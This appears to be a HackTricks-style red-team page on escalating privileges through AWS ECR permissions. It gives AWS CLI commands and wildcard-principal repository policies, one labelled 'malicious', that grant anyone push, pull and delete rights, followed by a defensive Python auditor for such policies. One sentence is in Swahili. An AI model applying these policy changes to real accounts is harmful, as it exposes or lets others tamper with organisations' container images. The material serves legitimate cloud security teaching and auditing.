AWS - ECR Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

ECR

ecr:GetAuthorizationToken, ecr:BatchGetImage

An attacker with ecr:GetAuthorizationToken and ecr:BatchGetImage can log in to ECR and download images.

For more information on how to download images:

See: AWS - ECR Post Exploitation

Potential Impact: Indirect privesc by intercepting sensitive information in the traffic.

ecr:GetAuthorizationToken, ecr:BatchCheckLayerAvailability, ecr:CompleteLayerUpload, ecr:InitiateLayerUpload, ecr:PutImage, ecr:UploadLayerPart

An attacker with all of those permissions can log in to ECR and upload images. This can be useful to escalate privileges to other environments where those images are being used.

Ili kujifunza jinsi ya kupakia picha mpya/kusasisha moja, angalia:

See: AWS - EKS Enum

ecr-public:GetAuthorizationToken, ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload, ecr-public:InitiateLayerUpload, ecr-public:PutImage, ecr-public:UploadLayerPart

Same as the previous section, but for public repositories.

ecr:SetRepositoryPolicy

An attacker with this permission can change the policy of the repository to grant himself (or even everyone) read/write access. In the following example, read access is granted to everyone.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Contents of my-policy.json:

{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Sid": "allow public pull",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "ecr:BatchCheckLayerAvailability",
        "ecr:BatchGetImage",
        "ecr:GetDownloadUrlForLayer"
      ]
    }
  ]
}

ecr-public:SetRepositoryPolicy

Same as in the previous section, but for public repositories. An attacker can modify the repository policy of an ECR Public repository to grant unauthorized public access or escalate their privileges.

# Create a JSON file with the malicious public repository policy
echo '{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Sid": "MaliciousPublicRepoPolicy",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "ecr-public:GetDownloadUrlForLayer",
        "ecr-public:BatchGetImage",
        "ecr-public:BatchCheckLayerAvailability",
        "ecr-public:PutImage",
        "ecr-public:InitiateLayerUpload",
        "ecr-public:UploadLayerPart",
        "ecr-public:CompleteLayerUpload",
        "ecr-public:DeleteRepositoryPolicy"
      ]
    }
  ]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy \
  --repository-name your-ecr-public-repo-name \
  --policy-text file://malicious_public_repo_policy.json

Potential Impact: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images.
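Both SetRepositoryPolicy sections above hinge on a policy whose Principal is "*". The following is an added defender-side example (not HackTricks code) that audits a repository policy document and flags such statements, ranking push/delete grants above pull-only ones; the sample policies are constructed to mirror the two shown on this page, and the role ARN and account id are placeholders.

```python
import json

# Actions that let a wildcard principal modify or delete repository content
# (private namespace listed; ecr-public equivalents are derived below).
_WRITE = {"PutImage", "InitiateLayerUpload", "UploadLayerPart", "CompleteLayerUpload",
          "BatchDeleteImage", "DeleteRepository", "SetRepositoryPolicy",
          "DeleteRepositoryPolicy"}
WRITE_ACTIONS = {f"{ns}:{a}" for ns in ("ecr", "ecr-public") for a in _WRITE}

# Constructed samples modelled on the two policies shown on this page.
PUBLIC_PULL_POLICY = json.dumps({"Version": "2008-10-17", "Statement": [{
    "Sid": "allow public pull", "Effect": "Allow", "Principal": "*",
    "Action": ["ecr:BatchCheckLayerAvailability", "ecr:BatchGetImage",
               "ecr:GetDownloadUrlForLayer"]}]})
PUBLIC_WRITE_POLICY = json.dumps({"Version": "2008-10-17", "Statement": [{
    "Sid": "MaliciousPublicRepoPolicy", "Effect": "Allow", "Principal": "*",
    "Action": ["ecr-public:BatchGetImage", "ecr-public:PutImage",
               "ecr-public:DeleteRepositoryPolicy"]}]})
# A policy scoped to one role ARN (placeholder account id) must yield no finding.
SCOPED_POLICY = json.dumps({"Version": "2008-10-17", "Statement": [{
    "Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::111111111111:role/ci"},
    "Action": ["ecr:BatchGetImage"]}]})


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _is_wildcard_principal(principal):
    """True when the Principal element admits any AWS identity."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))


def audit_repository_policy(policy_text):
    """One finding per Allow statement with a wildcard principal; severity is
    'critical' for push/delete or 'ecr:*', 'high' for pull-only, 'medium' when
    a Condition (e.g. aws:PrincipalOrgID) narrows it and needs manual review."""
    findings = []
    for stmt in _as_list(json.loads(policy_text).get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _is_wildcard_principal(stmt.get("Principal")):
            continue
        actions = _as_list(stmt.get("Action", []))
        write = any(a in WRITE_ACTIONS or a.endswith("*") for a in actions)
        severity = "medium" if stmt.get("Condition") else ("critical" if write else "high")
        findings.append({"sid": stmt.get("Sid", ""), "severity": severity,
                         "write": write, "actions": actions})
    return findings
```

In practice the policy text would come from `aws ecr get-repository-policy` or a CloudTrail SetRepositoryPolicy event, which is the point at which a newly opened repository should be alerted on.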

ecr:PutRegistryPolicy

An attacker with this permission can change the registry policy to grant himself, his account (or even everyone) read/write access.

# Registry policies are set with put-registry-policy (no --repository-name: they apply to the whole registry)
aws ecr put-registry-policy \
  --policy-text file://my-policy.json